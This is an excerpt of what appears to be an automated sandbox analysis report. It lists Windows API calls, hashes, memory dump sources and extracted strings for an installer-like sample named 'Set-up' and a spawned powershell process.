                                                                                                                                                  • API ID: Current$CountCounterPerformanceProcessQueryThreadTick
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1503542204-0
                                                                                                                                                  • Opcode ID: 060a1cf1ac6a0994894468fa00480d641d38a66179f2bf5c6fdd12283c075dfe
                                                                                                                                                  • Instruction ID: c982d0a7d4415f08ef8abe0cd6e448120289f0f5775d04f5d4af2b5bbda5b55f
                                                                                                                                                  • Opcode Fuzzy Hash: 060a1cf1ac6a0994894468fa00480d641d38a66179f2bf5c6fdd12283c075dfe
                                                                                                                                                  • Instruction Fuzzy Hash: B11193716583018BD300EF21D845A9FB7E0BBD471DF400A5DF585571A5FA389A0CCB9B
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00409362
                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,0047ADD8), ref: 004093A3
                                                                                                                                                    • Part of subcall function 004077C9: __EH_prolog.LIBCMT ref: 004077CE
                                                                                                                                                  • RemoveDirectoryA.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,0047ADD8), ref: 00409385
                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?,00000003,?,?,?,00000000,?,?,?,?,?,0047ADD8), ref: 004093D4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DirectoryRemove$H_prolog
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2658828398-0
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00409081
                                                                                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,?,00000000,8007000E,00000000,00000000,?,00000000), ref: 004090A5
                                                                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,?,00000000,8007000E,00000000,00000000,?,00000000), ref: 004090E8
                                                                                                                                                  • LocalFree.KERNEL32(8007000E,8007000E,?,00000000,8007000E,00000000,00000000,?,00000000), ref: 00409103
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FormatMessage$FreeH_prologLocal
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3392428314-0
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: wR@$B
                                                                                                                                                  • API String ID: 3519838083-3713363123
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004172FC
                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,0048BA9C,?,00000004,00000004,?,00000000,00000000), ref: 00417476
                                                                                                                                                  Strings
                                                                                                                                                  • Can not create output directory , xrefs: 00417487
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorH_prologLast
                                                                                                                                                  • String ID: Can not create output directory
                                                                                                                                                  • API String ID: 1057991267-273059976
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0042DD62
                                                                                                                                                    • Part of subcall function 0042EE86: __EH_prolog.LIBCMT ref: 0042EE8B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: wR@$B
                                                                                                                                                  • API String ID: 3519838083-3713363123
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0042D339
                                                                                                                                                    • Part of subcall function 00428229: __EH_prolog.LIBCMT ref: 0042822E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: $wR@
                                                                                                                                                  • API String ID: 3519838083-2271011043
                                                                                                                                                  • Opcode ID: 9391acb2885a2d43f2ed7551b5062c8b59cf924c08f4ae8d9f60bd3031d2459e
                                                                                                                                                  • Instruction ID: 3a40a4e534d3beb5bf4c537fda60f338fcd9a00d64a4a41d380eb200ca8b15a4
                                                                                                                                                  • Opcode Fuzzy Hash: 9391acb2885a2d43f2ed7551b5062c8b59cf924c08f4ae8d9f60bd3031d2459e
                                                                                                                                                  • Instruction Fuzzy Hash: CA719331E002199FCF14EFA5D5816AEB7B1FF44318F50412FE416A7692CB38AD45CBA9
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: %5A$d3A
                                                                                                                                                  • API String ID: 3519838083-2767413505
                                                                                                                                                  • Opcode ID: ecc0fe47c9a924543f1becdffa4d46a5f57dff026682a3ddd98b229740b21387
                                                                                                                                                  • Instruction ID: 2da3029afb12af2f40fe5342b83832acd5b98b54bc351901cbc3e749e302741b
                                                                                                                                                  • Opcode Fuzzy Hash: ecc0fe47c9a924543f1becdffa4d46a5f57dff026682a3ddd98b229740b21387
                                                                                                                                                  • Instruction Fuzzy Hash: 2971AF71600245DFCB14DFA8C98499EBBE1FF44315B1489AEE85ADB351CB38EE81CB49
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: $
                                                                                                                                                  • API String ID: 3519838083-227171996
                                                                                                                                                  • Opcode ID: 5d22a61501022fa1ef6c19f82d294658b39a3c367a11ee331ec8f500e0b646b7
                                                                                                                                                  • Instruction ID: 401e992827f1e5ee1ef7c2df62a3ed370906ef4e4740c61790c7d643f5ac8052
                                                                                                                                                  • Opcode Fuzzy Hash: 5d22a61501022fa1ef6c19f82d294658b39a3c367a11ee331ec8f500e0b646b7
                                                                                                                                                  • Instruction Fuzzy Hash: 1D718A31A0021ADFCB20DF9AE5C1AAEB7B1FF48314F50456ED41AA7281D774BA86CF54
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004250A8
                                                                                                                                                    • Part of subcall function 004075D4: __EH_prolog.LIBCMT ref: 004075D9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: @$CRC
                                                                                                                                                  • API String ID: 3519838083-2751826776
                                                                                                                                                  • Opcode ID: 8e38feba59387b06d60022575a81e10160ec1c47a2feac4b93a661906a37c69e
                                                                                                                                                  • Instruction ID: 9a25a8439b5879feea3b3cbac0dbfaa570f645d854de97b3c5c9ab764cf3f2f8
                                                                                                                                                  • Opcode Fuzzy Hash: 8e38feba59387b06d60022575a81e10160ec1c47a2feac4b93a661906a37c69e
                                                                                                                                                  • Instruction Fuzzy Hash: B451E331A00118EBCF11EB91D881AEEB7B5EF44304F50806FE902772C1DB786E45CBAA
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0042C483
                                                                                                                                                    • Part of subcall function 004075D4: __EH_prolog.LIBCMT ref: 004075D9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: HCF$RSFX
                                                                                                                                                  • API String ID: 3519838083-3415502821
                                                                                                                                                  • Opcode ID: 85f2bc895109f9ea30f695160d6c9ffe0a4425ed44aac4f9595e986470cefd9b
                                                                                                                                                  • Instruction ID: a78c53e83ed20bd3efb8cc37cd7b30341356c0c967d0a8b0c8163bd8f507b5d5
                                                                                                                                                  • Opcode Fuzzy Hash: 85f2bc895109f9ea30f695160d6c9ffe0a4425ed44aac4f9595e986470cefd9b
                                                                                                                                                  • Instruction Fuzzy Hash: 0D51A370E001159BCB14EB91D8D19AFB3729F94354F50C52BE812A7381DB7CA942CBAA
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Info
                                                                                                                                                  • String ID: $
                                                                                                                                                  • API String ID: 1807457897-3032137957
                                                                                                                                                  • Opcode ID: 9126253ed4df8a800f89eabd88dfa7c8242230fedd2ec87a70d7a1392de5d0ec
                                                                                                                                                  • Instruction ID: d76123435fc08ffee7341991f6c23c1f7fec3676eaefc47546e392dda9b50c1b
                                                                                                                                                  • Opcode Fuzzy Hash: 9126253ed4df8a800f89eabd88dfa7c8242230fedd2ec87a70d7a1392de5d0ec
                                                                                                                                                  • Instruction Fuzzy Hash: FB41493100425C1BEB128B1CCC49BFB7FAD9B06710F2840F7D14DD71B2C6694948CBAA
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: BCJ $LZMA:
                                                                                                                                                  • API String ID: 3519838083-462996315
                                                                                                                                                  • Opcode ID: c98d3916ab67d2eaf563a9b03259cf8f5095812f7d13645ee2a08f44c8345535
                                                                                                                                                  • Instruction ID: 4dfeecf7b596f67c49ca3122baf61174b9f4d12c3e4134812c030892e8c7915e
                                                                                                                                                  • Opcode Fuzzy Hash: c98d3916ab67d2eaf563a9b03259cf8f5095812f7d13645ee2a08f44c8345535
                                                                                                                                                  • Instruction Fuzzy Hash: 1521713190024D9FCB14EFA5D4908EEB771FF00304B54857BE4229BA95F738998ADB88
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: $d3A
                                                                                                                                                  • API String ID: 3519838083-2463995834
                                                                                                                                                  • Opcode ID: b1d21273dab7fdf059b43a5d704ee22b8d7ee51ee2c31cab646739de4e937c2e
                                                                                                                                                  • Instruction ID: e9d4cec92bf99425eb0af7354a97034f5dc71dcd0a868ff908182896e053cc7f
                                                                                                                                                  • Opcode Fuzzy Hash: b1d21273dab7fdf059b43a5d704ee22b8d7ee51ee2c31cab646739de4e937c2e
                                                                                                                                                  • Instruction Fuzzy Hash: 9C21B071A002098BCF14DFA5C5855EEBB72FF5830AF60401FD401B7341EB785A85CBA9
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: COM$LPT
                                                                                                                                                  • API String ID: 3519838083-915345583
                                                                                                                                                  • Opcode ID: 76a2da83e11e2d05ccfeeaebd1841f6466158b9b35046e6fb8c45d7aa1cb2d75
                                                                                                                                                  • Instruction ID: 6b0ef066b09de82b747c30dd307963e0cdfcc3e3973ecc499d2d1988d6bbd738
                                                                                                                                                  • Opcode Fuzzy Hash: 76a2da83e11e2d05ccfeeaebd1841f6466158b9b35046e6fb8c45d7aa1cb2d75
                                                                                                                                                  • Instruction Fuzzy Hash: FD11AF31E041158BCF04FF99C9445EEB3B2EF86358B10852FD112B7281C7785D85C7A9
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldiv__aullrem
                                                                                                                                                  • String ID: ps@
                                                                                                                                                  • API String ID: 3839614884-3648969447
                                                                                                                                                  • Opcode ID: 81452285641003b07a928d5af906baab9b9d95d41fb3be511c48d80199f9e401
                                                                                                                                                  • Instruction ID: 56237b07e16783e9b741eac6974e50dd3be842716ee98cc4c7de778574ef2070
                                                                                                                                                  • Opcode Fuzzy Hash: 81452285641003b07a928d5af906baab9b9d95d41fb3be511c48d80199f9e401
                                                                                                                                                  • Instruction Fuzzy Hash: 9E016D72A08198BAFB119BA48C80AFFBFBCEF46314F120077D441E7341D2388D119366
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldiv__aullrem
                                                                                                                                                  • String ID: ps@
                                                                                                                                                  • API String ID: 3839614884-3648969447
                                                                                                                                                  • Opcode ID: 0442da05a44c33f379b904c3c4e5c42a4996a2f79cfbd727fa3a53352f19f04d
                                                                                                                                                  • Instruction ID: 46bb8d81eff826039a297473cdee4f29e73d028a3c6ebbea8b1d18ef4ce3e168
                                                                                                                                                  • Opcode Fuzzy Hash: 0442da05a44c33f379b904c3c4e5c42a4996a2f79cfbd727fa3a53352f19f04d
                                                                                                                                                  • Instruction Fuzzy Hash: 6001A736A00308FBDB10DF85C881BEEB7B8FF55758F20006AE941AB291D3745E55C7A5
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(Advapi32.dll,00000000,?,004033D2,?,?,00000000,00000001,00000000), ref: 0040AFCB
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,004033D2,?,?,00000000,00000001,00000000), ref: 0040AFE7
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$FreeLoad
                                                                                                                                                  • String ID: Advapi32.dll
                                                                                                                                                  • API String ID: 534179979-3915320344
                                                                                                                                                  • Opcode ID: 4278834ec9cce2ffc35f50f93191967f2b486e3139bc921edc30ada9059e455d
                                                                                                                                                  • Instruction ID: 20873ef2e13710d6682d9995c15ba680629ab6c15623019065aed41590c97be6
                                                                                                                                                  • Opcode Fuzzy Hash: 4278834ec9cce2ffc35f50f93191967f2b486e3139bc921edc30ada9059e455d
                                                                                                                                                  • Instruction Fuzzy Hash: 3BD0A7616C27725F45122E2428158EE13096D937623101923F88163342971D0DBEA3EF
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00467D40: WaitForSingleObject.KERNEL32(00000004,000000FF,00414EAE,?,?,?,?,?,-00000015,?,00000001), ref: 00467D43
                                                                                                                                                    • Part of subcall function 00467D90: SetEvent.KERNEL32(00000000,00410875), ref: 00467D93
                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0045B7AF
                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0045B7BC
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0045B7F4
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0045B7F7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$EnterLeave$EventObjectSingleWait
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 497781136-0
                                                                                                                                                  • Opcode ID: f00641594f67dfe51fd12f5960b387a82b6f6c16f84c067c4e8ce7b92c2627a7
                                                                                                                                                  • Instruction ID: 3af2ea7900bef51d545bc08368118ad27f0d95d864bb49813a416335c3c57d34
                                                                                                                                                  • Opcode Fuzzy Hash: f00641594f67dfe51fd12f5960b387a82b6f6c16f84c067c4e8ce7b92c2627a7
                                                                                                                                                  • Instruction Fuzzy Hash: B14171316007059BC718EF75C880AAAB3E5FF88315F00462EE86A87756DB38B919CBD5
                                                                                                                                                  APIs
                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0046371E
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00463732
                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0046373E
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0046374E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                  • Opcode ID: be6f2f0e771557874f59cf4a697b6ecf98a20e479a6ff9401fa4c6aab200aca5
                                                                                                                                                  • Instruction ID: 3e3ca3dc5248aac95ec3b9a41c1ed57d8f5a30841b2515989fd127147094b4db
                                                                                                                                                  • Opcode Fuzzy Hash: be6f2f0e771557874f59cf4a697b6ecf98a20e479a6ff9401fa4c6aab200aca5
                                                                                                                                                  • Instruction Fuzzy Hash: 96117276500345DFC760DF24D48455AB7E8EFD436AF10482FE556C3201E774E988CB66
                                                                                                                                                  APIs
                                                                                                                                                  • HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,0046EAB0,00000000,00000000,00000000,0046C481,00000000,00000000,?,00000000,00000000,00000000), ref: 0046ED10
                                                                                                                                                  • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,0046EAB0,00000000,00000000,00000000,0046C481,00000000,00000000,?,00000000,00000000,00000000), ref: 0046ED44
                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 0046ED5E
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 0046ED75
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocHeap$FreeVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3499195154-0
                                                                                                                                                  • Opcode ID: 3bcb4379f52178a2747e8c7a2a0435444e081fa75036be3dcb41addd3b27817c
                                                                                                                                                  • Instruction ID: e99ee0c0c25addd6949028a1568b09d869036b3ae7477acd9cb2c513bb4242ad
                                                                                                                                                  • Opcode Fuzzy Hash: 3bcb4379f52178a2747e8c7a2a0435444e081fa75036be3dcb41addd3b27817c
                                                                                                                                                  • Instruction Fuzzy Hash: 4F119E30200202EFEB30AF29ED459267BF6FBA5314B910A7BF15AC21F0D370A851CB09
                                                                                                                                                  APIs
                                                                                                                                                  • InitializeCriticalSection.KERNEL32(?,0046DEA2,?,0046D3C4), ref: 0046E0CE
                                                                                                                                                  • InitializeCriticalSection.KERNEL32(?,0046DEA2,?,0046D3C4), ref: 0046E0D6
                                                                                                                                                  • InitializeCriticalSection.KERNEL32(?,0046DEA2,?,0046D3C4), ref: 0046E0DE
                                                                                                                                                  • InitializeCriticalSection.KERNEL32(?,0046DEA2,?,0046D3C4), ref: 0046E0E6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalInitializeSection
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 32694325-0
                                                                                                                                                  • Opcode ID: be83a6b61fd98b018acef9b2484046da8e9ac7c116fc1bf3366f94f776920b83
                                                                                                                                                  • Instruction ID: fdf1311b17fd7e53380e55c283ee5eac752405fd5b139eb65c3a85b7a9ff6beb
                                                                                                                                                  • Opcode Fuzzy Hash: be83a6b61fd98b018acef9b2484046da8e9ac7c116fc1bf3366f94f776920b83
                                                                                                                                                  • Instruction Fuzzy Hash: 2BC00231C021349FCF513B59FD0484E3FB5EB442A07158477A104511B08A211C62DFD8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.2252673174.0000000004080000.00000040.00000800.00020000.00000000.sdmp, Offset: 04080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_4080000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 94143ccc321bfb375d16a4fced104225825e16023dbdb8eaafe8ca997c04471a
                                                                                                                                                  • Instruction ID: fe7cc938bcab91403a13556edceefa07028a032063e51023f0bfb1030bd4e430
                                                                                                                                                  • Opcode Fuzzy Hash: 94143ccc321bfb375d16a4fced104225825e16023dbdb8eaafe8ca997c04471a
                                                                                                                                                  • Instruction Fuzzy Hash: 67724C74A00209EFCB05DFA8DA84AADBBF2FF49314F248559E845AB365D731ED41CB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.2252673174.0000000004080000.00000040.00000800.00020000.00000000.sdmp, Offset: 04080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_4080000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c39a0c91946fc3f52c05f0444643349cf4a843f410f69583e6c81878cab48c0a
                                                                                                                                                  • Instruction ID: 4c6e2e1d290f57e3e9970bf521c361096769309b3a3b429081466a111e034cd4
                                                                                                                                                  • Opcode Fuzzy Hash: c39a0c91946fc3f52c05f0444643349cf4a843f410f69583e6c81878cab48c0a
                                                                                                                                                  • Instruction Fuzzy Hash: EA423A74A002199FCB05DF98D984AAEFBF1FF49310F258559E845AB366C732ED81CB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.2252673174.0000000004080000.00000040.00000800.00020000.00000000.sdmp, Offset: 04080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_4080000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9fe1459af8bb16cffab9502482d1854dc0846408fff26bf95cc7f8871a75b813
                                                                                                                                                  • Instruction ID: dfcb60c50540dc14f5b0f46e585b1f3ab70f5c6553ae6cd0830f78456d1ec417
                                                                                                                                                  • Opcode Fuzzy Hash: 9fe1459af8bb16cffab9502482d1854dc0846408fff26bf95cc7f8871a75b813
                                                                                                                                                  • Instruction Fuzzy Hash: A6124D74A002099FCB05DF98C594AAEFBF2FF89310F248559E845AB365C736ED85CB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.2247937297.000000000055D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0055D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_55d000_powershell.jbxd